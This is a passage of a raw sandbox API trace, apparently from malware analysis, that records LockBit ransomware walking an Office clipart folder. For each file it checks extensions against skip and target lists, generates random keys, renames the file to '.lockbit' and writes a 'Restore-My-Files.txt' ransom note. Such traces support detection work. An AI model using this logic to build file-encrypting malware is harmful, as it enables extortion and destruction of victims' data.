dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.629] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19acdd00, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x58b00bb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x19acdd00, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x1090, dwReserved0=0x0, dwReserved1=0x0, cFileName="MP00132_.WMF", cAlternateFileName="")) returned 1 [0161.629] lstrcmpiW (lpString1=".", lpString2="MP00132_.WMF") returned -1 [0161.629] lstrcmpiW (lpString1="..", lpString2="MP00132_.WMF") returned -1 [0161.629] PathFindExtensionW (pszPath="MP00132_.WMF") returned=".WMF" [0161.629] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0161.629] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0161.629] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0161.629] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0161.629] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0161.629] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0161.629] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0161.629] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0161.629] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0161.629] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0161.629] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0161.630] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0161.630] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0161.630] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0161.630] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0161.630] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0161.630] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0161.630] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0161.630] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0161.630] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0161.630] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0161.630] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0161.630] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0161.630] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0161.630] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.630] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0161.630] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0161.630] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0161.630] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0161.630] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0161.630] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0161.630] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0161.631] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0161.631] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0161.631] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0161.631] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0161.631] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0161.631] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0161.631] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0161.631] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0161.631] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0161.631] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0161.631] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.631] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0161.631] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0161.631] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0161.631] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0161.631] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="MP00132_.WMF") returned 1 [0161.631] lstrcmpiW (lpString1="ntldr", lpString2="MP00132_.WMF") returned 1 [0161.631] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="MP00132_.WMF") returned 1 [0161.631] lstrcmpiW (lpString1="bootsect.bak", lpString2="MP00132_.WMF") returned -1 [0161.631] lstrcmpiW (lpString1="autorun.inf", lpString2="MP00132_.WMF") returned -1 [0161.631] lstrcmpiW (lpString1="thumbs.db", lpString2="MP00132_.WMF") returned 1 [0161.631] lstrcmpiW (lpString1="iconcache.db", lpString2="MP00132_.WMF") returned -1 [0161.632] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.632] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MP00132_.WMF") returned=".WMF" [0161.632] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0161.632] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0161.632] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0161.632] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0161.632] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0161.632] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0161.632] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0161.632] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0161.632] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0161.632] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0161.632] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0161.632] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0161.632] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0161.632] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0161.632] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0161.632] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0161.632] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0161.632] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0161.632] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0161.633] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0161.633] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0161.633] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0161.633] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0161.633] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0161.633] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0161.633] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0161.633] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0161.633] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0161.633] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MP00132_.WMF.lockbit") returned 72 [0161.633] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MP00132_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\mp00132_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0161.634] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.634] malloc (_Size=0x40068) returned 0x3d70450 [0161.634] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=4240) returned 1 [0161.634] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.635] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.635] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0161.635] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.635] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.635] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0161.636] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0161.640] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MP00132_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MP00132_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.640] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.640] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.642] free (_Block=0x1fa2ed8) [0161.642] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MP00132_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.642] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.642] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.642] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b16fc00, ftCreationTime.dwHighDateTime=0x1bd4bef, ftLastAccessTime.dwLowDateTime=0x69c72af0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1b16fc00, ftLastWriteTime.dwHighDateTime=0x1bd4bef, nFileSizeHigh=0x0, nFileSizeLow=0x31e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MP00646_.WMF", cAlternateFileName="")) returned 1 [0161.642] lstrcmpiW (lpString1=".", lpString2="MP00646_.WMF") returned -1 [0161.642] lstrcmpiW (lpString1="..", lpString2="MP00646_.WMF") returned -1 [0161.642] PathFindExtensionW (pszPath="MP00646_.WMF") returned=".WMF" [0161.642] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0161.642] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0161.642] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0161.642] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0161.642] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0161.642] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0161.642] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0161.642] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0161.642] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0161.643] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0161.643] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0161.643] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0161.643] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0161.643] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0161.643] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0161.643] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0161.643] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0161.643] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0161.643] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0161.643] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0161.643] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0161.643] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0161.643] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0161.643] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0161.643] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.643] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0161.643] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0161.643] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0161.643] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0161.643] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0161.643] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0161.644] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0161.644] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0161.644] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0161.644] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0161.644] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0161.644] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0161.644] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0161.644] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0161.644] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0161.644] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0161.644] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0161.644] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.644] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0161.644] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0161.644] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0161.644] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0161.644] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="MP00646_.WMF") returned 1 [0161.644] lstrcmpiW (lpString1="ntldr", lpString2="MP00646_.WMF") returned 1 [0161.644] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="MP00646_.WMF") returned 1 [0161.644] lstrcmpiW (lpString1="bootsect.bak", lpString2="MP00646_.WMF") returned -1 [0161.644] lstrcmpiW (lpString1="autorun.inf", lpString2="MP00646_.WMF") returned -1 [0161.645] lstrcmpiW (lpString1="thumbs.db", lpString2="MP00646_.WMF") returned 1 [0161.645] lstrcmpiW (lpString1="iconcache.db", lpString2="MP00646_.WMF") returned -1 [0161.645] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.645] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MP00646_.WMF") returned=".WMF" [0161.645] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0161.645] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0161.645] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0161.645] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0161.645] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0161.645] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0161.645] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0161.645] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0161.645] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0161.645] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0161.645] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0161.645] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0161.645] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0161.645] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0161.645] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0161.645] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0161.645] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0161.646] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0161.646] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0161.646] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0161.646] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0161.646] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0161.646] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0161.646] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0161.646] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0161.646] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0161.646] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0161.646] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0161.646] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MP00646_.WMF.lockbit") returned 72 [0161.646] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MP00646_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\mp00646_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0161.647] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.647] malloc (_Size=0x40068) returned 0x3f70048 [0161.647] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=12770) returned 1 [0161.648] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.648] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.648] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0161.648] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.649] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.649] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0161.649] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0161.655] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MP00646_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MP00646_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.655] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.655] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.656] free (_Block=0x1fa2ed8) [0161.656] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MP00646_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.656] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.656] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.657] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x1ae0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MUSIC_01.MID", cAlternateFileName="")) returned 1 [0161.657] lstrcmpiW (lpString1=".", lpString2="MUSIC_01.MID") returned -1 [0161.657] lstrcmpiW (lpString1="..", lpString2="MUSIC_01.MID") returned -1 [0161.657] PathFindExtensionW (pszPath="MUSIC_01.MID") returned=".MID" [0161.657] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0161.657] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0161.657] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0161.657] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0161.657] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0161.657] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0161.657] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0161.657] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0161.657] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0161.657] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0161.657] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0161.657] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0161.657] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0161.657] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0161.657] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0161.657] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0161.657] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0161.657] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0161.658] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0161.658] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0161.658] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0161.658] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0161.658] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0161.658] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0161.658] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0161.658] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0161.658] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0161.658] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0161.658] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0161.658] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0161.658] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0161.658] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0161.658] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0161.658] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0161.658] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0161.658] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0161.658] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0161.658] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0161.658] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0161.659] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0161.659] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0161.659] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0161.659] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0161.659] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0161.659] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0161.659] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0161.659] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0161.659] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="MUSIC_01.MID") returned 1 [0161.659] lstrcmpiW (lpString1="ntldr", lpString2="MUSIC_01.MID") returned 1 [0161.659] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="MUSIC_01.MID") returned 1 [0161.659] lstrcmpiW (lpString1="bootsect.bak", lpString2="MUSIC_01.MID") returned -1 [0161.659] lstrcmpiW (lpString1="autorun.inf", lpString2="MUSIC_01.MID") returned -1 [0161.659] lstrcmpiW (lpString1="thumbs.db", lpString2="MUSIC_01.MID") returned 1 [0161.659] lstrcmpiW (lpString1="iconcache.db", lpString2="MUSIC_01.MID") returned -1 [0161.659] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.659] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned=".MID" [0161.659] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0161.659] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0161.659] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0161.659] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0161.660] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0161.660] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0161.660] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0161.660] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0161.660] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0161.660] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0161.660] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0161.660] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0161.660] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0161.660] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0161.660] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0161.660] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0161.660] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0161.660] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0161.660] 